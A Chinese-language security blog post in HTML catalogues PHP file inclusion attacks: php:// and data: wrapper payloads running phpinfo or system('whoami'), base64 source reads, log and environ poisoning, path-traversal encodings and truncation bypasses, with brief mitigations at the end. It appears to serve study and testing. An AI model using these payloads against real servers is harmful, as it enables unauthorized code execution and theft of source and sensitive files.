<!DOCTYPE html>



  


<html class="theme-next mist use-motion" lang>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Sec_For_Everyday,">










<meta name="description" content="相关函数1234include() #如果出错的话，只会提出警告，会继续执行后续语句require() #如果在包含的过程中有错，比如文件不存在等，则会直接退出，不执行后续语句require_once()include_once() #功能与require() 和 include() 类似。但如果一个文件已经被包含过了，则 	       require_once() 和 include_once">
<meta name="keywords" content="Sec_For_Everyday">
<meta property="og:type" content="article">
<meta property="og:title" content="Sec_20190403_php文件包含">
<meta property="og:url" content="http://1tachi.github.io/2019/04/03/Sec-20190403-php文件包含/index.html">
<meta property="og:site_name" content="Itachi Blog">
<meta property="og:description" content="相关函数1234include() #如果出错的话，只会提出警告，会继续执行后续语句require() #如果在包含的过程中有错，比如文件不存在等，则会直接退出，不执行后续语句require_once()include_once() #功能与require() 和 include() 类似。但如果一个文件已经被包含过了，则 	       require_once() 和 include_once">
<meta property="og:locale" content="default">
<meta property="og:updated_time" content="2019-04-04T01:59:54.924Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Sec_20190403_php文件包含">
<meta name="twitter:description" content="相关函数1234include() #如果出错的话，只会提出警告，会继续执行后续语句require() #如果在包含的过程中有错，比如文件不存在等，则会直接退出，不执行后续语句require_once()include_once() #功能与require() 和 include() 类似。但如果一个文件已经被包含过了，则 	       require_once() 和 include_once">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Mist',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://1tachi.github.io/2019/04/03/Sec-20190403-php文件包含/">





  <title>Sec_20190403_php文件包含 | Itachi Blog</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="default">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Itachi Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://1tachi.github.io/2019/04/03/Sec-20190403-php文件包含/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="John Doe">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Itachi Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Sec_20190403_php文件包含</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-04-03T20:37:04+08:00">
                2019-04-03
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <h3 id="相关函数"><a href="#相关函数" class="headerlink" title="相关函数"></a>相关函数</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>() <span class="comment">#如果出错的话，只会提出警告，会继续执行后续语句</span></span><br><span class="line"><span class="keyword">require</span>() <span class="comment">#如果在包含的过程中有错，比如文件不存在等，则会直接退出，不执行后续语句</span></span><br><span class="line"><span class="keyword">require_once</span>()</span><br><span class="line"><span class="keyword">include_once</span>() <span class="comment">#功能与require() 和 include() 类似。但如果一个文件已经被包含过了，则 	       require_once() 和 include_once() 则不会再包含它，以避免函数重定义或变量重赋值等问题</span></span><br></pre></td></tr></table></figure>
<h3 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h3><ol>
<li>具有相关的文件包含函数；</li>
<li>文件包含函数中存在动态变量，比如 <code>include $file;</code></li>
<li>攻击者能够控制该变量，比如<code>$file = $_GET[&#39;file&#39;];</code></li>
</ol>
<h3 id="分类"><a href="#分类" class="headerlink" title="分类"></a>分类</h3><ul>
<li><p>[ ] ### LFI(Local File Inclusion)</p>
</li>
<li><p>[ ] ### RFI(Remote File Inclusion)</p>
<p><code>利用条件：</code> 需要php.ini 中进行配置，且需要以下均设置为On;</p>
<p>​                   allow_url_fopen默认一直是On，而allow_url_include从php5.2之后就默认为Off</p>
<ul>
<li>allow_url_fopen = On</li>
<li>allow_url_include = On</li>
</ul>
</li>
</ul>
<h2 id="php伪协议"><a href="#php伪协议" class="headerlink" title="php伪协议"></a>php伪协议</h2><h4 id="php-input"><a href="#php-input" class="headerlink" title="php://input"></a>php://input</h4><p>​    <code>利用条件：</code></p>
<ol>
<li>allow_url_include = On。</li>
<li>对allow_url_fopen不做要求。</li>
</ol>
<p>​      <code>姿势：</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=php:<span class="comment">//input<span class="meta">&lt;?</span> phpinfo();<span class="meta">?&gt;</span></span></span><br></pre></td></tr></table></figure>
<h3 id="php-filter"><a href="#php-filter" class="headerlink" title="php://filter"></a>php://filter</h3><p><code>利用条件：无</code></p>
<p> <code>姿势：</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=php:<span class="comment">//filter/read=convert.base64-encode/resource=index.php</span></span><br><span class="line">index.php?file=php:<span class="comment">//filter/convert.base64-encode/resource=index.php</span></span><br></pre></td></tr></table></figure>
<p><code>作用：</code></p>
<p>通过指定末尾的文件，可以读取经base64加密后的文件源码，之后再base64解码一下就行。虽然不能直接获取到shell等，但能读取敏感文件危害也是挺大的。</p>
<h3 id="phar"><a href="#phar" class="headerlink" title="phar://"></a>phar://</h3><p><code>利用条件：</code></p>
<ol>
<li>php版本大于等于php5.3.0</li>
</ol>
<p><code>姿势：</code></p>
<p>假设有个文件phpinfo.txt，其内容为<code>&lt;?php phpinfo(); ?&gt;</code>，打包成zip压缩包：phpinfo.zip</p>
<p><code>指定绝对路径/相对路径：</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phar:<span class="comment">//D:/phpStudy/WWW/fileinclude/test.zip/phpinfo.txt</span></span><br><span class="line">index.php?file=phar:<span class="comment">//test.zip/phpinfo.txt</span></span><br></pre></td></tr></table></figure>
<h3 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h3><p><code>利用条件：</code></p>
<ol>
<li>php版本大于等于php5.3.0</li>
</ol>
<p><code>姿势：</code><br>构造zip包的方法同phar。</p>
<p>但使用zip协议，需要指定绝对路径，同时将#编码为%23，之后填上压缩包内的文件(注：若是使用相对路径，则会包含失败)<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=zip:<span class="comment">//D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt</span></span><br></pre></td></tr></table></figure></p>
<h3 id="data-URI-schema"><a href="#data-URI-schema" class="headerlink" title="data:URI schema"></a>data:URI schema</h3><p><code>利用条件：</code></p>
<ol>
<li>php版本大于等于php5.2</li>
<li>allow_url_fopen = On</li>
<li>allow_url_include = On</li>
</ol>
<p><code>姿势1：</code><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain,<span class="meta">&lt;?php</span> phpinfo();<span class="meta">?&gt;</span></span><br><span class="line">index.php?file=data:text/plain,<span class="meta">&lt;?php</span> system(<span class="string">'whoami'</span>);<span class="meta">?&gt;</span> <span class="comment">#执行命令</span></span><br></pre></td></tr></table></figure></p>
<p><code>姿势2：</code><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%<span class="number">2</span>b</span><br><span class="line">index.php?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg== <span class="comment">#执行命令</span></span><br></pre></td></tr></table></figure></p>
<p>注：加号+的url编码为%2b，PD9waHAgcGhwaW5mbygpOz8+的base64解码为：&lt;?php phpinfo();?&gt;</p>
<h3 id="包含session"><a href="#包含session" class="headerlink" title="包含session"></a>包含session</h3><p><code>利用条件：</code><br>session文件路径已知，且其中内容部分可控。<br><code>姿势：</code><br>php的session文件的保存路径可以在phpinfo的session.save_path看到；<br>在默认情况下一般是保存在/tmp目录中，session的文件名格式为sess_[phpsessid]。而phpsessid在发送的请求的cookie字段中可以看到，要包含并利用的话，需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候，可以先包含进session文件，观察里面的内容，然后根据里面的字段来发现可控的变量，从而利用变量来写入payload，并之后再次包含从而执行php代码。</p>
<h2 id="包含日志"><a href="#包含日志" class="headerlink" title="包含日志"></a>包含日志</h2><h3 id="访问日志"><a href="#访问日志" class="headerlink" title="访问日志"></a>访问日志</h3><p><code>利用条件：</code><br>需要知道服务器日志的存储路径，且日志文件可读<br><code>姿势：</code><br>很多时候，web服务器会将请求写入到日志文件中，比如说apache。在用户发起请求时，会将请求写入access.log，当发生错误时将错误写入error.log。默认情况下，日志保存路径在 /var/log/apache2/但如果是直接发起请求，会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改。<br>在一些场景中，log的地址是被修改掉的。你可以通过读取相应的配置文件后，再进行包含。</p>
<h3 id="SSH-log"><a href="#SSH-log" class="headerlink" title="SSH log"></a>SSH log</h3><p><code>利用条件：</code><br>需要知道ssh-log的位置，且可读。默认情况下为 /var/log/auth.log<br><code>姿势：</code><br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">ubuntu@VM<span class="number">-207</span><span class="number">-93</span>-ubuntu:~$ ssh <span class="string">'&lt;?php phpinfo(); ?&gt;'</span>@remotehost <span class="comment">#用ssh连接</span></span><br></pre></td></tr></table></figure></p>
<p>之后会提示输入密码等等，随便输入；然后在remotehost的ssh-log中即可写入php代码，之后进行文件包含即可。</p>
<h3 id="包含environ"><a href="#包含environ" class="headerlink" title="包含environ"></a>包含environ</h3><p><code>利用条件：</code></p>
<ol>
<li>php以cgi方式运行，这样environ才会保持UA头。</li>
<li>environ文件存储位置已知，且environ文件可读</li>
</ol>
<p><code>姿势：</code><br>proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码，则php代码会被写入到environ中。之后再包含它即可。</p>
<h3 id="包含fd"><a href="#包含fd" class="headerlink" title="包含fd"></a>包含fd</h3><p>跟包含environ类似</p>
<h3 id="包含临时文件"><a href="#包含临时文件" class="headerlink" title="包含临时文件"></a>包含临时文件</h3><p><code>姿势：</code><br>php中上传文件，会创建临时文件。在linux下使用/tmp目录，而在windows下使用c:\winsdows\temp目录。在临时文件被删除之前，利用竞争即可包含该临时文件。</p>
<p>由于包含需要知道包含的文件名。一种方法是进行暴力猜解，linux下使用的随机函数有缺陷，而window下只有65535中不同的文件名，所以这个方法是可行的。</p>
<p>另一种方法是配合phpinfo页面的php variables，可以直接获取到上传文件的存储路径和临时文件名，直接包含即可。这个方法可以参考LFI With PHPInfo Assistance类似利用临时文件的存在，竞争时间去包含的。</p>
<h3 id="包含上传文件"><a href="#包含上传文件" class="headerlink" title="包含上传文件"></a>包含上传文件</h3><p><code>利用条件：</code><br>千变万化，不过至少得知道上传的文件在哪，叫啥名字。。。</p>
<h2 id="绕过姿势"><a href="#绕过姿势" class="headerlink" title="绕过姿势"></a>绕过姿势</h2><h3 id="指定前缀绕过"><a href="#指定前缀绕过" class="headerlink" title="指定前缀绕过"></a>指定前缀绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file = $_GET[<span class="string">'file'</span>];	<span class="keyword">include</span> <span class="string">'/var/www/html/'</span>.$file; <span class="comment">#类似代码</span></span><br></pre></td></tr></table></figure>
<ol>
<li>目录遍历</li>
</ol>
<p>现在在/var/log/test.txt文件中有php代码&lt;?php phpinfo();?&gt;，则利用../可以进行目录遍历，比如我们尝试访问：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span>.php?file=../../log/test.txt</span><br></pre></td></tr></table></figure></p>
<p>则服务器端实际拼接出来的路径为：/var/www/html/../../log/test.txt，也即/var/log/test.txt。从而包含成功。</p>
<ol start="2">
<li>编码绕过</li>
</ol>
<p>服务器端常常会对于<code>../</code>等做一些过滤，可以用一些编码来进行绕过</p>
<ul>
<li><p>[ ] 利用url编码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">../</span><br><span class="line">  %2e%2e%2f</span><br><span class="line">  ..%2f</span><br><span class="line">  %2e%2e/</span><br><span class="line">..\</span><br><span class="line">  %2e%2e%5c</span><br><span class="line">  ..%5c</span><br><span class="line">  %2e%2e\</span><br></pre></td></tr></table></figure>
</li>
<li><p>[ ] 二次编码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">  ../</span><br><span class="line">     %252e%252e%252f</span><br><span class="line">..\</span><br><span class="line">    %252e%252e%255c</span><br></pre></td></tr></table></figure>
</li>
<li><p>[ ] 容器/服务器的编码方式</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">../</span><br><span class="line">  ..%c0%af</span><br><span class="line">  %c0%ae%c0%ae/</span><br><span class="line">      注：java中会把”%c0%ae”解析为”\uC0AE”，最后转义为ASCCII字符的”.”（点）</span><br><span class="line">      Apache Tomcat Directory Traversal</span><br><span class="line">..\</span><br></pre></td></tr></table></figure>
</li>
</ul>
<h3 id="指定后缀绕过"><a href="#指定后缀绕过" class="headerlink" title="指定后缀绕过"></a>指定后缀绕过</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file = $_GET[<span class="string">'file'</span>];	<span class="keyword">include</span> $file.<span class="string">'/test/test.php'</span>;  <span class="comment">#测试代码</span></span><br></pre></td></tr></table></figure>
<ol>
<li><p>URL 绕过<br> url格式：</p>
 <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">protocol :<span class="comment">// hostname[:port] / path / [;parameters][?query]#fragment</span></span><br></pre></td></tr></table></figure>
<p> <code>姿势一：query（？）</code></p>
 <figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=http://remoteaddr/remoteinfo.txt?</span><br></pre></td></tr></table></figure>
<p> 则包含的文件为 <a href="http://remoteaddr/remoteinfo.txt?/test/test.php" target="_blank" rel="noopener">http://remoteaddr/remoteinfo.txt?/test/test.php</a><br> 问号后面的部分<code>/test/test.php</code>，也就是指定的后缀被当作query从而被绕过</p>
</li>
</ol>
<p>​       <code>姿势二：fragment（#）</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=http:<span class="comment">//remoteaddr/remoteinfo.txt%23</span></span><br></pre></td></tr></table></figure>
<p>则包含的文件为 <a href="http://remoteaddr/remoteinfo.txt#/test/test.php" target="_blank" rel="noopener">http://remoteaddr/remoteinfo.txt#/test/test.php</a><br>问号后面的部分/test/test.php，也就是指定的后缀被当作fragment从而被绕过。注意需要把#进行url编码为%23</p>
<h3 id="利用协议"><a href="#利用协议" class="headerlink" title="利用协议"></a>利用协议</h3><p>前面有提到过利用zip协议和phar协议。假设现在测试代码为</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$file = $_GET[<span class="string">'file'</span>];	<span class="keyword">include</span> $file.<span class="string">'/test/test.php'</span>; <span class="comment">#测试代码</span></span><br></pre></td></tr></table></figure>
<p>利用zip协议，注意要指定绝对路径</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=zip:<span class="comment">//D:\phpStudy\WWW\fileinclude\chybeta.zip%23chybeta</span></span><br></pre></td></tr></table></figure>
<p>则拼接后为：zip://D:\phpStudy\WWW\fileinclude\chybeta.zip#chybeta/test/test.php</p>
<h3 id="长度截断"><a href="#长度截断" class="headerlink" title="长度截断"></a>长度截断</h3><p><code>利用条件：</code></p>
<p>php版本 &lt; php 5.2.8</p>
<p><code>姿势：</code></p>
<p>目录字符串，在linux下4096字节时会达到最大值，在window下是256字节。只要不断的重复<code>./</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=././././。。。省略。。。././shell.txt</span><br></pre></td></tr></table></figure>
<p>则后缀<code>/test/test.php</code>，在达到最大值后会被直接丢弃掉。</p>
<h3 id="0字节截断"><a href="#0字节截断" class="headerlink" title="0字节截断"></a>0字节截断</h3><p><code>利用条件：</code></p>
<p>php版本 &lt; php 5.3.4</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">index.php?file=phpinfo.txt%<span class="number">00</span></span><br></pre></td></tr></table></figure>
<p>能利用00截断的场景现在应该很少了：）</p>
<ol>
<li>在很多场景中都需要去包含web目录之外的文件，如果php配置了open_basedir，则会包含失败</li>
<li>做好文件的权限管理</li>
<li>对危险字符进行过滤等等</li>
</ol>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Sec-For-Everyday/" rel="tag"># Sec_For_Everyday</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/04/03/Google-Hack常用语法/" rel="next" title="Google Hack常用语法">
                <i class="fa fa-chevron-left"></i> Google Hack常用语法
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">John Doe</p>
              <p class="site-description motion-element" itemprop="description">The quieter you become, the more you are able to hear.</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">4</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                
                  <span class="site-state-item-count">3</span>
                  <span class="site-state-item-name">tags</span>
                
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#相关函数"><span class="nav-number">1.</span> <span class="nav-text">相关函数</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#场景"><span class="nav-number">2.</span> <span class="nav-text">场景</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#分类"><span class="nav-number">3.</span> <span class="nav-text">分类</span></a></li></ol><li class="nav-item nav-level-2"><a class="nav-link" href="#php伪协议"><span class="nav-number"></span> <span class="nav-text">php伪协议</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#php-input"><span class="nav-number">0.1.</span> <span class="nav-text">php://input</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#php-filter"><span class="nav-number">1.</span> <span class="nav-text">php://filter</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#phar"><span class="nav-number">2.</span> <span class="nav-text">phar://</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#zip"><span class="nav-number">3.</span> <span class="nav-text">zip://</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#data-URI-schema"><span class="nav-number">4.</span> <span class="nav-text">data:URI schema</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#包含session"><span class="nav-number">5.</span> <span class="nav-text">包含session</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#包含日志"><span class="nav-number"></span> <span class="nav-text">包含日志</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#访问日志"><span class="nav-number">1.</span> <span class="nav-text">访问日志</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#SSH-log"><span class="nav-number">2.</span> <span class="nav-text">SSH log</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#包含environ"><span class="nav-number">3.</span> <span class="nav-text">包含environ</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#包含fd"><span class="nav-number">4.</span> <span class="nav-text">包含fd</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#包含临时文件"><span class="nav-number">5.</span> <span class="nav-text">包含临时文件</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#包含上传文件"><span class="nav-number">6.</span> <span class="nav-text">包含上传文件</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#绕过姿势"><span class="nav-number"></span> <span class="nav-text">绕过姿势</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#指定前缀绕过"><span class="nav-number">1.</span> <span class="nav-text">指定前缀绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#指定后缀绕过"><span class="nav-number">2.</span> <span class="nav-text">指定后缀绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#利用协议"><span class="nav-number">3.</span> <span class="nav-text">利用协议</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#长度截断"><span class="nav-number">4.</span> <span class="nav-text">长度截断</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0字节截断"><span class="nav-number">5.</span> <span class="nav-text">0字节截断</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">John Doe</span>

  
</div>


  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Mist</a> v5.1.4</div>




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
